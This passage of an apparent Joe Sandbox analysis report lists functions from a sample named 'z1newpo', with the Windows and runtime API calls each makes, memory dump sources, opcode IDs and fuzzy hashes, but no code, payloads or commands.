                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                    • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                    Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                    Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00415012
                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                    Function 0426B0C0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0426A930: GetFileAttributesW.KERNELBASE(?), ref: 0426A93B
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0426B1EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesCreateDirectoryFile
                                                    • String ID:
                                                    • API String ID: 3401506121-0
                                                    • Opcode ID: fef485108c8867a555c341ca00a06f0667b0adcde9fceacf1968bdbcc6e43f4b
                                                    • Instruction ID: 18a86b145cf6d97f62f277a3124165e51d299a253eadfb904a325a7963f3da91
                                                    • Opcode Fuzzy Hash: fef485108c8867a555c341ca00a06f0667b0adcde9fceacf1968bdbcc6e43f4b
                                                    • Instruction Fuzzy Hash: 61519631A2121997EF14EFB0C954BEF7779EF58300F0045A9A509E7280EB79BB44CBA5
                                                    Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                    • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                    Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                    • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                    • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                    • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                    Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                    Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                    • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                    Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                    • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                    • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                    • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                    Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __lock_file
                                                    • String ID:
                                                    • API String ID: 3031932315-0
                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                    Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                    • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                    • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                    • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                    Function 0426A930 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0426A93B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction ID: 0df45957b5594eb7f82717b7af11429486d0de7114d092f268d85d728bd07ce5
                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction Fuzzy Hash: 2EE08631726209DBC710CEE888156AD73A4D706320F204654E41BD3180D530B980D658
                                                    Function 0426A900 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0426A90B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction ID: 2cf436ab5a7eb5acfa90ce9bf009ae88ded55a8b212877cc6d44985b2413bb18
                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction Fuzzy Hash: AED0A731A2620CEBCB10CFF49C049DA73A8D705320F104755FD16D3380D531AE809754
                                                    Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                    Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                    • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                    • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                    • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                    Function 0426C2EC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: 908015f23009c2751d5eeb897610d7b0df669d3a590179ba016697fe45056e10
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: 48E0BF7494010DEFDB10EFA8D5496DE7BB4EF04301F1005A1FD05D7681DB309E648A62
                                                    Function 0426C2F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: eefa3541187b651820aada43d4517aeff75abbf72c3bc592f9b939e77cd00cd5
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 5DE0E67494010DDFDB00EFB8D54969E7FB4EF04301F100561FD01D2281D6309D608A62

                                                    Non-executed Functions

                                                    Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                    • ImageList_SetDragCursorImage.COMCTL32(00950AB8,00000000,00000000,00000000), ref: 0047CB9B
                                                    • ImageList_BeginDrag.COMCTL32(00950AB8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                    • SendMessageW.USER32 ref: 0047CD12
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                    • SendMessageW.USER32 ref: 0047CD80
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                    • SendMessageW.USER32 ref: 0047CE93
                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,016A1C20,00000000,?,?,?,?), ref: 0047CF1C
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,016A1C20,00000000,?,?,?,?), ref: 0047CFE6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
